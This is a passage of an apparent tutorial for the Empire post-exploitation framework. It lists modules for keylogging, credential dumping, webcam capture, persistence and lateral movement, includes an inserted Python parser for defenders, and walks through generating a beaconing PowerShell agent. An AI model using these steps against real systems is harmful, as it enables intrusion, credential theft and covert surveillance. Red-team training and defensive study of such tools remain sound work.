powershell/situational_awareness/network/powerview/get_dfs_share powershell/situational_awareness/network/powerview/get_domain_controller powershell/situational_awareness/network/powerview/get_domain_policy powershell/situational_awareness/network/powerview/get_domain_trust powershell/situational_awareness/network/powerview/get_fileserver powershell/situational_awareness/network/powerview/get_forest powershell/situational_awareness/network/powerview/get_forest_domain powershell/situational_awareness/network/powerview/get_gpo powershell/situational_awareness/network/powerview/get_group powershell/situational_awareness/network/powerview/get_group_member 
powershell/situational_awareness/network/powerview/get_localgroup powershell/situational_awareness/network/powerview/get_loggedon powershell/situational_awareness/network/powerview/get_object_acl powershell/situational_awareness/network/powerview/get_ou powershell/situational_awareness/network/powerview/get_rdp_session powershell/situational_awareness/network/powerview/get_session powershell/situational_awareness/network/powerview/get_site powershell/situational_awareness/network/powerview/get_subnet powershell/situational_awareness/network/powerview/get_user powershell/situational_awareness/network/powerview/map_domain_trust powershell/situational_awareness/network/powerview/process_hunter powershell/situational_awareness/network/powerview/set_ad_object powershell/situational_awareness/network/powerview/share_finder powershell/situational_awareness/network/powerview/user_hunter powershell/situational_awareness/network/reverse_dns powershell/situational_awareness/network/smbautobrute powershell/situational_awareness/network/smbscanner powershell/trollsploit/get_schwifty powershell/trollsploit/message powershell/trollsploit/process_killer powershell/trollsploit/rick_ascii powershell/trollsploit/rick_astley powershell/trollsploit/thunderstruck powershell/trollsploit/voicetroll powershell/trollsploit/wallpaper powershell/trollsploit/wlmdr python/collection/linux/hashdump* python/collection/linux/keylogger python/collection/linux/mimipenguin* python/collection/linux/pillage_user python/collection/linux/sniffer* python/collection/linux/xkeylogger python/collection/osx/browser_dump python/collection/osx/clipboard python/collection/osx/hashdump* python/collection/osx/imessage_dump python/collection/osx/kerberosdump python/collection/osx/keychaindump* python/collection/osx/keychaindump_chainbreaker python/collection/osx/keychaindump_decrypt python/collection/osx/keylogger python/collection/osx/native_screenshot python/collection/osx/native_screenshot_mss 
python/collection/osx/osx_mic_record python/collection/osx/pillage_user python/collection/osx/prompt python/collection/osx/screensaver_alleyoop python/collection/osx/screenshot python/collection/osx/search_email python/collection/osx/sniffer* python/collection/osx/webcam python/exploit/web/jboss_jmx python/lateral_movement/multi/ssh_command python/lateral_movement/multi/ssh_launcher python/management/multi/kerberos_inject python/management/multi/socks python/management/multi/spawn python/management/osx/screen_sharing python/management/osx/shellcodeinject64* python/persistence/multi/crontab python/persistence/multi/desktopfile python/persistence/osx/CreateHijacker* python/persistence/osx/LaunchAgentUserLandPersistence python/persistence/osx/RemoveDaemon* python/persistence/osx/launchdaemonexecutable* python/persistence/osx/loginhook python/persistence/osx/mail python/privesc/linux/linux_priv_checker python/privesc/linux/unix_privesc_check python/privesc/multi/bashdoor python/privesc/multi/sudo_spawn python/privesc/osx/dyld_print_to_file python/privesc/osx/piggyback python/privesc/windows/get_gpppasswords python/situational_awareness/host/multi/SuidGuidSearch python/situational_awareness/host/multi/WorldWriteableFileSearch python/situational_awareness/host/osx/HijackScanner python/situational_awareness/host/osx/situational_awareness python/situational_awareness/network/active_directory/dscl_get_groupmembers python/situational_awareness/network/active_directory/dscl_get_groups python/situational_awareness/network/active_directory/dscl_get_users python/situational_awareness/network/active_directory/get_computers python/situational_awareness/network/active_directory/get_domaincontrollers python/situational_awareness/network/active_directory/get_fileservers python/situational_awareness/network/active_directory/get_groupmembers python/situational_awareness/network/active_directory/get_groupmemberships python/situational_awareness/network/active_directory/get_groups 
python/situational_awareness/network/active_directory/get_ous python/situational_awareness/network/active_directory/get_userinformation python/situational_awareness/network/active_directory/get_users python/situational_awareness/network/dcos/chronos_api_add_job python/situational_awareness/network/dcos/chronos_api_delete_job python/situational_awareness/network/dcos/chronos_api_start_job python/situational_awareness/network/dcos/etcd_crawler python/situational_awareness/network/dcos/marathon_api_create_start_app python/situational_awareness/network/dcos/marathon_api_delete_app python/situational_awareness/network/find_fruit python/situational_awareness/network/gethostbyname python/situational_awareness/network/http_rest_api python/situational_awareness/network/port_scan python/situational_awareness/network/smb_mount python/trollsploit/osx/change_background python/trollsploit/osx/login_message* python/trollsploit/osx/say python/trollsploit/osx/thunderstruck
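The listing above is what Empire's tab completion prints: every entry is language/category/.../module, and some names in this tutorial's output carry a trailing "*". As an added example (not code from the page or from the Empire project), here is a small Python parser that turns such a listing into a per-category inventory, which is handy for a defender mapping which capability areas (credentials, lateral movement, persistence, ...) need detection coverage; it assumes the "*" marks modules that need an elevated agent, and it uses a constructed excerpt of the list as input.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: a handful of entries in the form Empire's tab completion
# prints them (language/category/.../name, whitespace separated). The trailing
# '*' on some names is ASSUMED here to mark modules that need an elevated agent.
SAMPLE_LISTING = """
powershell/credentials/mimikatz/sam* powershell/credentials/tokens
powershell/lateral_movement/invoke_psexec powershell/lateral_movement/invoke_wmi
powershell/persistence/elevated/schtasks* powershell/persistence/userland/schtasks
powershell/privesc/bypassuac_fodhelper powershell/privesc/getsystem*
powershell/recon/find_fruit python/situational_awareness/network/find_fruit
python/collection/osx/keychaindump* python/persistence/multi/crontab
"""

# language / path (may contain sub-folders, dashes, digits, mixed case) / optional '*'
MODULE_RE = re.compile(r"^(?P<lang>[a-z]+)/(?P<path>[\w\-./]+?)(?P<admin>\*)?$")


def parse_listing(text):
    """Split a raw listing into (language, category, module_name, needs_admin) tuples."""
    modules = []
    for token in text.split():
        m = MODULE_RE.match(token)
        if not m:
            raise ValueError(f"unexpected module token: {token!r}")
        parts = m.group("path").split("/")
        # first path element is the top-level category (credentials, privesc, ...),
        # last one is the module name itself
        modules.append((m.group("lang"), parts[0], parts[-1], m.group("admin") == "*"))
    return modules


def category_summary(modules):
    """Map (language, category) -> (module count, how many of them need admin)."""
    total, admin = Counter(), Counter()
    for lang, cat, _name, needs_admin in modules:
        total[(lang, cat)] += 1
        if needs_admin:
            admin[(lang, cat)] += 1
    return {key: (total[key], admin[key]) for key in sorted(total)}


def find_duplicate_names(modules):
    """Module names that appear under more than one language/category (e.g. find_fruit)."""
    seen = defaultdict(set)
    for lang, cat, name, _needs_admin in modules:
        seen[name].add(f"{lang}/{cat}")
    return {name: sorted(places) for name, places in seen.items() if len(places) > 1}


if __name__ == "__main__":
    for (lang, cat), (count, adm) in category_summary(parse_listing(SAMPLE_LISTING)).items():
        print(f"{lang}/{cat}: {count} modules, {adm} need an elevated agent")
```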
We will learn more about different modules in a later tutorial. First, let's take a look at how to use modules in Empire. Let's use the "external/generate_agent" as an example. Type usemodule external/generate_agent to load the module. Once the required module is loaded, type help to see all the commands we can use with the module.
(Empire: agents) > usemodule external/generate_agent
(Empire: external/generate_agent) > help

Module Commands
===============

agents        Jump to the agents menu.
back          Go back a menu.
creds         Display/return credentials from the database.
execute       Execute the given Empire module.
exit          Exit Empire.
help          Displays the help menu.
info          Display module options.
interact      Interact with a particular agent.
list          Lists all active agents (or listeners).
listeners     Jump to the listeners menu.
main          Go back to the main menu.
options       Display module options.
reload        Reload the current module.
resource      Read and execute a list of Empire commands from a file.
run           Execute the given Empire module.
set           Set a module option.
unset         Unset a module option.
usemodule     Use an Empire PowerShell module.
- agents - Will allow you to jump directly to the agents menu.
- back & main - Will take you back to the main menu.
- exit - Will exit from Empire.
- help - Will display the help menu as shown in the output above.
- info - Will display information about the active listener.
- kill - Is used to kill a particular listener.
- execute or run - Will execute the selected module.
- interact - Is used to interact with a particular agent (normally used when there are multiple listeners).
- list - Will list all the active listeners or agents.
- options - Is used to see all the options we need to set for the particular agent.
- set and unset - Used to set and unset values for particular options.
- listeners - Used to jump to the listeners menu.
- reload - Will reload the current module.
Type the options command to see the options required for the module.
(Empire: external/generate_agent) > options

              Name: Generate Agent
            Module: external/generate_agent
           Authors: @harmj0y

Description:
  Generates an agent code instance for a specified listener, pre-staged,
  and register the agent in the database. This allows the agent to begin
  beconing behavior immediately.

Options:

  Name       Required    Value         Description
  ----       --------    -------       -----------
  Listener   True                      Listener to generate the agent for.
  OutFile    True        /tmp/agent    Output file to write the agent code to.
  Language   True                      Language to generate for the agent.

(Empire: external/generate_agent) >
Set each required option using the set command (here Listener and Language; OutFile already has a default), and when that is complete, use the execute command to run the module and generate the agent.
(Empire: external/generate_agent) > set Listener http
(Empire: external/generate_agent) > set Language powershell
(Empire: external/generate_agent) > execute
[*] New agent N74NC8TD checked in
[+] Pre-generated agent 'N74NC8TD' now registered.
[*] powershell agent code for listener http with sessionID 'QKHQXGMU' written out to /tmp/agent
[*] Run sysinfo command after agent starts checking in!
We will get into more detail about Empire in the upcoming sections. These are the first steps in getting Empire up and running, so stay tuned for more! You can leave any questions in the comments below.